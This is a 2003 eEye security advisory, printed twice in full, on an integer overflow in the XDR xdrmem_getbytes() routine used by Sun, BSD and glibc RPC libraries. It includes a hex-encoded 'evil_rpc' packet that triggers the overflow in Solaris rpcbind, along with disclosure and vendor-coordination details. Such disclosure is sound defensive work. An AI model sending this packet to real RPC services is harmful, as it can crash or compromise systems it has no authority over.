Advisories
XDR Integer Overflow
Release Date:
March 19, 2003
Severity:
High (Remote Code Execution/Denial of Service)
Vendor:
Sun Microsystems
Systems Affected:
Sun Microsystems Network Services Library (libnsl)
BSD-derived libraries with XDR/RPC routines (libc)
GNU C library with sunrpc (glibc)
Overview:
XDR is a standard for the description and encoding of data which is used heavily in RPC implementations. Several libraries exist that allow a developer to incorporate XDR into his or her applications. Vulnerabilities were discovered in these libraries during the testing of new Retina auditing technologies developed by the eEye research department.
ADAM and EVE are two technologies developed by eEye to remotely and locally audit applications for the existence of common vulnerabilities. During an ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR library. By supplying specific integer values in length fields during an RPC transaction, we were able to produce various overflow conditions in UNIX RPC services.
Technical Details:
Technical Description
The xdrmem_getbytes() function in the XDR library provided by Sun Microsystems contains an integer overflow. Depending on the location and use of the vulnerable xdrmem_getbytes() routine, various conditions may be presented that can permit an attacker to remotely exploit a service using this vulnerable routine.
For the purpose of signature development and further security research, a sample session is included below that replicates an integer overflow in the rpcbind shipped with various versions of the Solaris operating system.
char evil_rpc[] =
"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
"\xFF\xFF\xFF\xFF" // RPC argument length
"EEYECLIPSE2003";
Vendor Status:
Sun Microsystems was contacted on November 13, 2002 and CERT was contacted shortly afterwards. Vendors believed to be vulnerable were contacted by CERT during a grace period of several months. Due to some difficulties communicating with vendors, after rescheduling several times a release date was set for March 18, 2003.
eEye recommends obtaining the necessary patches or updates from vendors as they become available after the release of this and the CERT advisory.
For a list of vendors and responses please review the CERT advisory at: http://www.cert.org/advisories/CA-2003-10.html
Credit:
Riley Hassell - Senior Research Associate
Greetings:
Liver destroyers of the world: Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn.
Copyright (c) 1998-2008 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
March 19, 2003
Severity:
High (Remote Code Execution/Denial of Service)
Vendor:
Sun Microsystems
Systems Affected:
Sun Microsystems Network Services Library (libnsl)
BSD-derived libraries with XDR/RPC routines (libc)
GNU C library with sunrpc (glibc)
Overview:
XDR is a standard for the description and encoding of data which is used heavily in RPC implementations. Several libraries exist that allow a developer to incorporate XDR into his or her applications. Vulnerabilities were discovered in these libraries during the testing of new Retina auditing technologies developed by the eEye research department.
ADAM and EVE are two technologies developed by eEye to remotely and locally audit applications for the existence of common vulnerabilities. During an ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR library. By supplying specific integer values in length fields during an RPC transaction, we were able to produce various overflow conditions in UNIX RPC services.
Technical Details:
Technical Description
The xdrmem_getbytes() function in the XDR library provided by Sun Microsystems contains an integer overflow. Depending on the location and use of the vulnerable xdrmem_getbytes() routine, various conditions may be presented that can permit an attacker to remotely exploit a service using this vulnerable routine.
For the purpose of signature development and further security research, a sample session is included below that replicates an integer overflow in the rpcbind shipped with various versions of the Solaris operating system.
char evil_rpc[] =
"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
"\xFF\xFF\xFF\xFF" // RPC argument length
"EEYECLIPSE2003";
Vendor Status:
Sun Microsystems was contacted on November 13, 2002 and CERT was contacted shortly afterwards. Vendors believed to be vulnerable were contacted by CERT during a grace period of several months. Due to some difficulties communicating with vendors, after rescheduling several times a release date was set for March 18, 2003.
eEye recommends obtaining the necessary patches or updates from vendors as they become available after the release of this and the CERT advisory.
For a list of vendors and responses please review the CERT advisory at: http://www.cert.org/advisories/CA-2003-10.html
Credit:
Riley Hassell - Senior Research Associate
Greetings:
Liver destroyers of the world: Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn.
Copyright (c) 1998-2008 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
